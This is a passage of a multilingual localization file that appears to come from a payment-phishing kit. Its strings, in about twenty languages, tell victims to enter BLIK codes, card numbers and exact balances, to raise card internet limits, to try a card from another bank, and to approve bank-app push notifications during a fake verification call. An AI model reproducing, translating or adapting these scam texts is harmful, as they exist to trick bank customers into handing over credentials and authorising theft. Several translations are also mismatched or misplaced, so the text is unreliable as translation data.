    it: "",
    ch: "",
    no: "BLIK betaling"
  },
  blik_code_text: {
    pl: "Wygeneruj kod Blika na swoim koncie i wpisz go",
    en: "Generate a Blik code on your account and enter it",
    es: "Genera un código Blik en tu cuenta e introdúcelo",
    dk: "Generer en Blik-kode på din konto, og indtast den",
    pt: "Gere um código Blik na sua conta e introduza-o",
    ua: "Сгенерируйте код Blik на своем аккаунте и введите его",
    ro: "Generați un cod Blik în contul dvs. și introduceți-l",
    se: "Skapa en Blik-kod på ditt konto och ange den.",
    hr: "Generirajte Blik kôd na svoj račun i unesite ga",
    sk: "Vygenerujte Blik kód na svojom účte a zadajte ho",
    fr: "Générez un code Blik sur votre compte et entrez-le.",
    bg: "Генерирайте код Blik в профила си и го въведете",
    rs: "Генерирајте БЛИК код на вашем налогу и унесите га",
    be: "",
    it: "",
    ch: "",
    no: "Generer Blik-kode på kontoen din og skriv den inn"
  },
  blik_code_placeholder: {
    pl: "Kod BLIK",
    en: "BLIK code",
    es: "Código BLIK",
    dk: "BLIK-kode",
    pt: "Código BLIK",
    ua: "код BLIK",
    ro: "Cod BLIK",
    se: "BLIK-kod",
    hr: "Šifra bljeska",
    sk: "BLIK kód",
    fr: "Code BLIK",
    bg: "Код BLIK",
    rs: "Блик код",
    be: "",
    it: "",
    ch: "",
    no: "BLIK-kode"
  },
  picture_title: {
    pl: "Podczas weryfikacji konta w systemie będziemy podawać telefonem tytuł obrazku, który musisz podać dla potwierdzenia. Po podaniu prawidłowych obrazków środki będą zaksięgowane na koncie.",
    en: "When verifying your account in the system, we will provide the image title with your phone, which you must provide for confirmation. Once the correct images are provided, the funds will be credited to your account.",
    es: "Al verificar su cuenta en el sistema, le proporcionaremos el título de la imagen con su teléfono, que deberá proporcionar para su confirmación. Una vez proporcionadas las imágenes correctas, los fondos se acreditarán en su cuenta.",
    dk: "Når du bekræfter din konto i systemet, får du billedets titel sammen med din telefon, som du skal fremvise til bekræftelse. Når de korrekte billeder er angivet, vil pengene blive krediteret din konto.",
    pt: "Ao verificar a sua conta no sistema, forneceremos o título da imagem com o seu telefone, que deverá fornecer para confirmação. Assim que as imagens correctas forem fornecidas, os fundos serão creditados na sua conta.",
    ua: "При проверке вашего счета в системе мы предоставим название изображения с вашим телефоном, который вы должны предоставить для подтверждения. После предоставления правильных изображений средства будут зачислены на ваш счет.",
    ro: "La verificarea contului dvs. în sistem, vă vom furniza titlul imaginii cu telefonul dvs., pe care trebuie să îl furnizați pentru confirmare. Odată ce imaginile corecte sunt furnizate, fondurile vor fi creditate în contul dumneavoastră.",
    se: "När du verifierar ditt konto i systemet kommer vi att ge dig bildtiteln tillsammans med din telefon, som du måste visa upp för bekräftelse. När de korrekta bilderna har tillhandahållits kommer pengarna att krediteras till ditt konto.",
    hr: "Kada provjeravate svoj račun na sustavu, dat ćemo naziv slike s vašeg telefona koji morate osigurati za potvrdu. Nakon što se daju ispravne slike, sredstva će biti upisana na vaš račun.",
    sk: "Pri kontrole účtu v systéme uvedieme názov obrázku s vaším telefónnym číslom, ktoré musíte uviesť pre potvrdenie. Po odoslaní správnych obrázkov budú prostriedky pripísané na váš účet.",
    fr: "Lors de la vérification de votre compte dans le système, nous vous fournirons le titre de l'image avec votre téléphone, que vous devrez fournir pour confirmation. Une fois que les images correctes sont fournies, les fonds seront crédités sur votre compte.",
    bg: "При проверката на профила ви в системата ще предоставим заглавието на изображението с вашия телефон, което трябва да предоставите за потвърждение. След като предоставите правилните изображения, средствата ще бъдат преведени по сметката ви.",
    rs: "Приликом верификације вашег рачуна у систему ћемо вам пружити наслов слике са телефоном који морате да дате за потврду. Једном када се дају исправне слике, средства ће се приписати вашем налогу.",
    be: "",
    it: "",
    ch: "Bei der Überprüfung Ihres Kontos im System geben wir den Namen des Bildes mit Ihrem Telefon bekannt, den Sie zur Bestätigung angeben müssen. Sobald die richtigen Bilder eingereicht wurden, wird das Geld Ihrem Konto gutgeschrieben.",
    cs: "Při kontrole vašeho účtu v systému poskytneme název obrázku s vaším telefonem, který musíte uvést pro potvrzení. Po odeslání správných obrázků budou prostředky připsány na váš účet.",
    no: ""
  },
  picture_text: {
    pl: "Za chwilę zadzwonimy do Ciebie i powiemy słowo-obrazek. W niektórych przypadkach po podaniu pierwszego obrazku wyślemy powiadomienie push do aplikacji banku, które trzeba potwierdzić.",
    en: "In a moment, we will call you and say a word-picture. In some cases, we'll send a push notification to your bank's app after you provide the first picture that you need to confirm.",
    es: "En un momento, te llamaremos y diremos una palabra-imagen. En algunos casos, enviaremos una notificación push a la app de tu banco después de que proporciones la primera imagen que debes confirmar.",
    dk: "Om et øjeblik vil vi ringe til dig og sige et ord-billede. I nogle tilfælde sender vi en push-meddelelse til din banks app, efter at du har givet det første billede, som du skal bekræfte.",
    pt: "Dentro de momentos, chamar-vos-emos e diremos uma palavra-imagem. Nalguns casos, enviaremos uma notificação de empurrão à aplicação do seu banco depois de nos fornecer a primeira fotografia que precisa de confirmar.",
    ua: "Через некоторое время мы позвоним вам и скажем слово-фотографию. В некоторых случаях мы отправим push-уведомление в приложение вашего банка после того, как вы предоставите первую фотографию, которую необходимо подтвердить.",
    ro: "În câteva clipe, vă vom suna și vă vom spune un cuvânt-magine. În unele cazuri, vom trimite o notificare push în aplicația băncii dvs. după ce furnizați prima imagine pe care trebuie să o confirmați.",
    se: "Om ett ögonblick kommer vi att ringa dig och säga ett ord - en bild. I vissa fall skickar vi ett push-meddelande till din banks app efter att du har lämnat den första bilden som du behöver bekräfta.",
    hr: "Za minutu ćemo vas nazvati i reći vam riječ-sliku. U nekim ćemo slučajevima poslati obavijest o guranju u aplikaciju banke nakon što pošaljete prvu fotografiju koju trebate potvrditi.",
    fr: "Dans un instant, nous vous appellerons pour vous dire un mot-image. Dans certains cas, nous enverrons une notification push à l'application de votre banque après que vous aurez fourni la première photo à confirmer.",
    bg: "След малко ще ви се обадим и ще ви кажем една дума - картина. В някои случаи ще изпратим известие за натискане в приложението на банката ви, след като предоставите първата снимка, която трябва да потвърдите.",
    rs: "У трену, назваћемо вас и изговоримо неку слику. У неким случајевима ћемо послати пусх нотификацију апликацији ваше банке након што наведете прву слику коју морате да потврдите.",
    sk: "Po chvíli vám zavoláme a povieme slovo fotka. V niektorých prípadoch po zadaní prvej fotografie na overenie pošleme do aplikácie vašej banky upozornenie push.",
    be: "",
    it: "",
    ch: "Nach einer Weile rufen wir Sie an und sagen das Wort Foto. In einigen Fällen senden wir eine Push-Benachrichtigung an die App Ihrer Bank, nachdem Sie das erste zu verifizierende Foto bereitgestellt haben.",
    cs: "Po chvíli vám zavoláme a řekneme slovo fotka. V některých případech odešleme oznámení push do aplikace vaší banky poté, co poskytnete první fotografii k ověření."
  },
  wrong_picture: {
    pl: "Wybrałeś złe zdjęcie",
    en: "You chose the wrong photo",
    es: "Has elegido la foto equivocada",
    dk: "Du har valgt det forkerte foto",
    pt: "Escolheu a fotografia errada",
    ua: "Вы выбрали не ту фотографию",
    ro: "Ai ales fotografia greșită",
    se: "Du valde fel foto",
    hr: "Odabrali ste pogrešnu fotografiju",
    sk: "Vybrali ste nesprávnu fotku",
    fr: "Vous avez choisi la mauvaise photo",
    bg: "Избрали сте грешната снимка",
    rs: "Изабрали сте погрешну фотографију",
    be: "",
    it: "",
    ch: "Du hast das falsche Foto gewählt",
    cs: "Vybrali jste špatnou fotku",
    no: "Du valgte feil bilde"
  },
  submit: {
    pl: "Prześlij",
    en: "Submit",
    es: "Enviar",
    dk: "Indsend",
    pt: "Submeter",
    ua: "Отправить",
    ro: "Trimiteți",
    se: "Skicka in",
    hr: "Pošalji",
    sk: "Poslať",
    fr: "Soumettre",
    bg: "Изпрати",
    rs: "Пошаљите",
    be: "Indienen",
    it: "Invia",
    ch: "senden",
    cs: "poslat",
    no: "sende",
    lt: "nosūtīt",
    lv: "siųsti",
    est: "saada"
  },
  error: {
    pl: "Wystąpił nieoczekiwany błąd. Spróbuj ponownie",
    en: "An unexpected error has occurred. Please try again",
    es: "Se ha producido un error inesperado. Por favor, inténtelo de nuevo",
    dk: "Der er opstået en uventet fejl. Prøv venligst igen",
    pt: "Ocorreu um erro inesperado. Por favor, tente novamente",
    ua: "Произошла непредвиденная ошибка. Пожалуйста, попробуйте еще раз",
    ro: "A apărut o eroare neașteptată. Vă rugăm să încercați din nou",
    se: "Ett oväntat fel har inträffat. Försök igen.",
    hr: "Došlo je do neočekivane pogreške. Pokušajte ponovo",
    sk: "Nastala neočakávaná chyba. Prosím skúste znova",
    fr: "Une erreur inattendue s'est produite. Veuillez réessayer",
    bg: "Възникнала е неочаквана грешка. Моля, опитайте отново",
    rs: "Дошло је до непредвиђене грешке. Покушајте поново",
    be: "Er is een onverwachte fout opgetreden. Gelieve opnieuw te proberen",
    it: "Si è verificato un errore inaspettato. Si prega di riprovare",
    ch: "Ein unerwarteter Fehler ist aufgetreten. Bitte versuche es erneut",
    cs: "Došlo k neočekávané chybě. Prosím zkuste to znovu.",
    no: "En uventet feil har oppstått. Vær så snill, prøv på nytt",
    lt: "Radās neparedzēta kļūda. Lūdzu mēģiniet vēlreiz",
    lv: "Įvyko netikėta klaida. Prašau, pabandykite dar kartą",
    est: "Tekkis ootamatu viga. Palun proovi uuesti"
  },
  error_title: {
    pl: "Błąd",
    en: "Error",
    es: "Error",
    dk: "Fejl",
    pt: "Erro",
    ua: "Ошибка",
    ro: "Eroare",
    se: "Fel",
    hr: "Greška",
    sk: "Chyba",
    fr: "Erreur",
    bg: "Грешка",
    rs: "Дошло је до неочекиване грешке. Молим вас, покушајте поново",
    be: "Fout",
    it: "Errore",
    ch: "Fehler",
    cs: "Chyba",
    no: "Feil",
    lt: "Kļūda",
    lv: "Klaida",
    est: "Viga"
  },
  card_number_invalid: {
    pl: "Numer karty jest nieprawidłowy",
    en: "Card number is incorrect",
    es: "El número de tarjeta es incorrecto",
    dk: "Kortnummeret er forkert",
    pt: "O número do cartão está incorrecto",
    ua: "Неверный номер карты",
    ro: "Numărul cardului este incorect",
    se: "Kortnumret är felaktigt",
    hr: "Neispravan broj kartice",
    sk: "nesprávne číslo karty",
    fr: "Le numéro de la carte est incorrect",
    bg: "Номерът на картата е грешен",
    rs: "Број картице је нетачан",
    be: "Kaartnummer is onjuist",
    it: "Il numero della carta non è corretto",
    ch: "Ungültige Kartennummer",
    cs: "neplatné číslo karty",
    no: "",
    lt: "Nederīgs kartes numurs",
    lv: "Neteisingas kortelės numeris",
    est: "vigane kaardinumber"
  },
  attention: {
    pl: "Uwaga",
    en: "Attention",
    es: "Atención",
    dk: "Opmærksomhed",
    pt: "Atenção",
    ua: "Внимание",
    ro: "Atenție",
    se: "Uppmärksamhet",
    hr: "Pozor",
    sk: "Pozornosť",
    fr: "Attention",
    bg: "Внимание",
    rs: "Пажња",
    be: "Attentie",
    it: "Attenzione",
    ch: "Beachtung",
    cs: "Pozornost",
    no: "Merk følgende",
    lt: "Uzmanību",
    lv: "Dėmesio",
    est: "Tähelepanu"
  },
  bank_asked: {
    pl: "Bank poprosił o podanie dodatkowych informacji o karcie bankowej w celu weryfikacji własności karty.",
    en: "The bank requested additional bank card information to verify card ownership.",
    es: "El banco solicitó información adicional sobre la tarjeta bancaria para verificar su titularidad.",
    dk: "Banken anmodede om yderligere oplysninger om bankkortet for at verificere ejerskabet af kortet.",
    pt: "O banco solicitou informações adicionais sobre o cartão bancário para verificar a propriedade do cartão.",
    ua: "Банк запросил дополнительную информацию о банковской карте, чтобы подтвердить ее принадлежность.",
    ro: "Banca a solicitat informații suplimentare despre cardul bancar pentru a verifica proprietatea acestuia.",
    se: "Banken begärde ytterligare information om bankkortet för att verifiera kortets ägarförhållanden.",
    hr: "Banka je zatražila dodatne informacije o bankovnoj kartici kako bi potvrdila vlasnika kartice.",
    sk: "Banka si vyžiadala dodatočné informácie o bankovej karte na potvrdenie jej vlastníctva.",
    fr: "La banque a demandé des informations supplémentaires sur la carte bancaire pour en vérifier la propriété.",
    bg: "Банката поиска допълнителна информация за банковата карта, за да провери нейната собственост.",
    rs: "Банка је затражила додатну информацију банковне картице да потврди власништво над картицама.",
    be: "De bank vroeg om aanvullende bankkaartinformatie om de eigendom van de kaart te verifiëren",
    it: "La banca ha richiesto ulteriori informazioni sulla carta di credito per verificarne la proprietà.",
    ch: "Die Bank hat zusätzliche Informationen über die Bankkarte angefordert, um ihr Eigentum zu bestätigen.",
    cs: "Banka si vyžádala další informace o bankovní kartě, aby potvrdila její vlastnictví.",
    no: "Banken ba om tilleggsinformasjon om bankkortet for å bekrefte eierskapet.",
    lt: "Banka pieprasīja papildu informāciju par bankas karti, lai apstiprinātu tās īpašumtiesības.",
    lv: "Bankas paprašė papildomos informacijos apie banko kortelę, kad patvirtintų jos nuosavybės teisę.",
    est: "Pank küsis pangakaardi kohta lisateavet selle omandiõiguse kinnitamiseks."
  },
  wait: {
    pl: "Expect",
    en: "Expect",
    es: "Espere",
    dk: "Forvent",
    pt: "Esperar",
    ua: "Ожидайте",
    ro: "Așteptați-vă la",
    se: "Förvänta dig",
    hr: "Očekivati",
    sk: "Očakávajte",
    fr: "Attendez-vous à",
    bg: "Очаквайте",
    rs: "Очекивати",
    be: "Verwacht",
    it: "Aspettatevi",
    ch: "Erwarten",
    cs: "Očekávat",
    no: "Forvent",
    lt: "Gaidīt",
    lv: "Tikėtis",
    est: "Oodata"
  },
  bank_processes: {
    pl: "Bank przetwarza Twoje dane. Może to zająć trochę czasu",
    en: "The bank is processing your data. This may take some time",
    es: "El banco está procesando sus datos. Esto puede llevar algún tiempo",
    dk: "Banken behandler dine oplysninger. Dette kan tage noget tid",
    pt: "O banco está a processar os seus dados. Isto pode demorar algum tempo",
    ua: "Банк обрабатывает ваши данные. Это может занять некоторое время",
    ro: "Banca prelucrează datele dumneavoastră. Acest lucru poate dura ceva timp",
    se: "Banken behandlar dina uppgifter. Detta kan ta en viss tid.",
    hr: "Banka obrađuje vaše podatke. To može potrajati neko vrijeme",
    sk: "Banka spracováva vaše údaje. Môže to chvíľu trvať",
    fr: "La banque traite vos données. Cela peut prendre un certain temps",
    bg: "Банката обработва вашите данни. Това може да отнеме известно време.",
    rs: "Банка обрађује ваше податке. Ово може потрајати",
    be: "De bank is uw gegevens aan het verwerken. Dit kan enige tijd duren",
    it: "La banca sta elaborando i suoi dati. Questo può richiedere del tempo",
    ch: "Die Bank verarbeitet Ihre Daten. Das kann ein bisschen dauern",
    cs: "Banka zpracovává vaše údaje. To může chvíli trvat",
    no: "Banken behandler dataene dine. Dette kan ta litt tid",
    lt: "Banka apstrādā jūsu datus. Tas var aizņemt kādu laiku",
    lv: "Bankas tvarko jūsų duomenis. Tai gali užtrukti šiek tiek laiko",
    est: "Pank töötleb teie andmeid. See võib veidi aega võtta"
  },
  limits: {
    pl: "Musisz podnieść limity internetowe na swojej karcie, aby zrealizować transakcję!",
    en: "You need to raise the internet limits on your card to make a transaction!",
    es: "Tienes que aumentar los límites de Internet de tu tarjeta para completar la transacción.",
    dk: "Du er nødt til at hæve internetgrænserne på dit kort for at gennemføre transaktionen!",
    pt: "Tem de aumentar os limites da Internet no seu cartão para completar a transacção!",
    ua: "На вашей карте необходимо поднять интернет лимиты для выполнения транзакции!",
    ro: "Trebuie să măriți limitele de internet ale cardului dvs. pentru a efectua o tranzacție!",
    se: "Du måste höja internetgränserna på ditt kort för att göra en transaktion!",
    hr: "Morate povećati ograničenja Interneta na kartici kako biste izvršili transakciju!",
    sk: "Na dokončenie transakcie musíte zvýšiť internetové limity na svojej karte!",
    fr: "Vous devez augmenter les limites internet de votre carte pour effectuer une transaction!",
    bg: "За да извършите транзакция, трябва да увеличите интернет лимитите на картата си!",
    rs: "Банка обрађује ваше податке. Ово може потрајати неко време",
    be: "U moet de internetlimieten op uw kaart verhogen om een transactie te doen!",
    it: "Devi aumentare i limiti internet della tua carta per fare una transazione!",
    ch: "Sie müssen die Internetlimits Ihrer Karte erhöhen, um die Transaktion abzuschließen!",
    cs: "Pro dokončení transakce musíte zvýšit internetové limity na vaší kartě!",
    no: "Du må heve internettgrensene på kortet ditt for å fullføre transaksjonen!",
    lt: "Lai pabeigtu darījumu, jums ir jāpalielina jūsu kartes interneta limiti!",
    lv: "Norėdami užbaigti operaciją, turite padidinti kortelės interneto limitą!",
    est: "Tehingu sooritamiseks peate tõstma oma kaardil Interneti-limiite!"
  },
  other_card: {
    pl: "Obecnie nie współpracujemy z kartami tego banku. Musisz podać kartę z innego banku!",
    en: "At this moment we do not cooperate with cards of this bank. You need to specify a card of another bank!",
    es: "Actualmente no cooperamos con las tarjetas de este banco. Es necesario especificar una tarjeta de otro banco.",
    dk: "Vi samarbejder i øjeblikket ikke med denne banks kort. Du skal angive et kort fra en anden bank!",
    pt: "Actualmente não cooperamos com os cartões deste banco. Precisa de especificar um cartão de outro banco!",
    ua: "В данный момент мы не сотрудничаем с картами этого банка. Вам необходимо указать карту другого банка!",
    ro: "În acest moment nu cooperăm cu cardurile acestei bănci. Trebuie să specificați un card de la o altă bancă!",
    se: "För närvarande samarbetar vi inte med kort från denna bank. Du måste ange ett kort från en annan bank!",
    hr: "Trenutačno ne surađujemo s karticama Ove banke. Morate navesti karticu druge banke!",
    sk: "Momentálne nespolupracujeme s kartami tejto banky. Musíte zadať kartu inej banky!",
    fr: "En ce moment, nous ne coopérons pas avec les cartes de cette banque. Vous devez spécifier une carte d'une autre banque !",
    bg: "В момента не си сътрудничим с карти на тази банка. Трябва да посочите карта на друга банка!",
    rs: "У овом тренутку не сарађујемо са картицама ове банке. Морате да одредите картицу друге банке!",
    be: "Op dit moment werken wij niet samen met kaarten van deze bank. U dient een kaart van een andere bank op te geven!",
    it: "In questo momento non collaboriamo con le carte di questa banca. È necessario specificare una carta di un'altra banca!",
    ch: "Im Moment kooperieren wir nicht mit den Karten dieser Bank. Sie müssen die Karte einer anderen Bank angeben!",
    cs: "V tuto chvíli nespolupracujeme s kartami této banky. Musíte zadat kartu jiné banky!",
    no: "For øyeblikket samarbeider vi ikke med kortene til denne banken. Du må spesifisere kortet til en annen bank!",
    lt: "Šobrīd ar šīs bankas kartēm nesadarbojamies. Jānorāda citas bankas karte!",
    lv: "Šiuo metu su šio banko kortelėmis nebendradarbiaujame. Reikia nurodyti kito banko kortelę!",
    est: "Hetkel me selle panga kaartidega koostööd ei tee. Peate määrama teise panga kaardi!"
  },
  for_verify: {
    pl: "",
    en: "",
    es: "",
    dk: "",
    pt: "",
    ua: "Для верификации карты необходимо иметь более 1000 грн. на балансе",
    ro: "",
    se: "",
    hr: "",
    fr: "",
    bg: "",
    rs: "",
    be: "",
    it: "",
  },
  correct_balance: {
    pl: "Wprowadź dokładne saldo na swojej karcie!",
    en: "Enter the exact balance on your card!",
    es: "Introduzca el saldo exacto de su tarjeta.",
    dk: "Indtast den nøjagtige saldo på dit kort!",
    pt: "Introduza o saldo exacto no seu cartão!",
    ua: "Введите точный остаток средств на вашей карте!",
    ro: "Introduceți soldul exact al cardului dumneavoastră!",
    se: "Ange det exakta saldot på ditt kort!",
    hr: "Unesite točan saldo na kartici!",
    sk: "Zadajte presný zostatok na vašej karte!",
    fr: "Entrez le solde exact de votre carte !",
    bg: "Въведете точния баланс на картата си!",
    rs: "Унесите тачан салдо на своју картицу!",
    be: "Geef het exacte saldo op uw kaart in!",
    it: "Inserisci il saldo esatto della tua carta!",
    ch: "Geben Sie den genauen Saldo auf Ihrer Karte ein!",
    cs: "Zadejte přesný zůstatek na vaší kartě!",
    no: "Skriv inn den nøyaktige saldoen på kortet ditt!",
    lt: "evadiet precīzu savas kartes atlikumu",
    lv: "Įveskite tikslų kortelės likutį",
    est: "Sisestage oma kaardi täpne saldo"
  },
  currency: {
    pl: "zł",
    en: "£",
    es: "€",
    dk: "kr",
    pt: "€",
    ua: "₴",
    ro: "lei",
    se: "kr",
    hr: "Kn",
    sk: "€",
    fr: "€",
    it: "€",
    be: "€",
    bg: "лв",
    rs: "din",
    ch: "F",
    cs: "CZF",
    no: "NOK",
    lt: "€",
    lv: "€",
    est: "€"
  },
};
